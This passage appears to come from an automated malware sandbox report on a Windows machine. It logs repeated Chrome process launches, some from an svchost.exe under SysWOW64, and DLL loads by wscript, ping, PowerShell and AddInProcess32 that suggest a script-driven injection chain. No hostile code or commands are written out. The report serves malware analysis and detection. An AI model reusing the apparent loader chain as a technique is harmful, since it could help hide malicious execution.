            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,16982306025501434778,10627650727957162702,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2008,i,18146508179752881524,919200875560916846,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,15823624400460166783,6536935139452576376,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1964,i,5440842566350035257,10787203092068946937,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2032,i,11553977204438472227,7445186355205850417,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1988,i,7374315475741238408,2210743874770523791,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,3916554340437548015,1500443498568681016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2016,i,9777007145685273446,11700763769562909530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1968,i,9602569947055018222,14101658706447688223,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1492,i,7162340336741099282,8203552688004924699,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2012,i,3848042767598446159,15832118433102009625,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2028,i,15924250175209133703,8349155567450697044,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=1980,i,7225582587041739135,14714490613506234970,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,8574600569835257597,12503451850514221727,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1648 --field-trial-handle=1996,i,18342384901192943427,3001916881733487027,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2008,i,13349874762832594225,9819071068630656309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
            Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
            Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
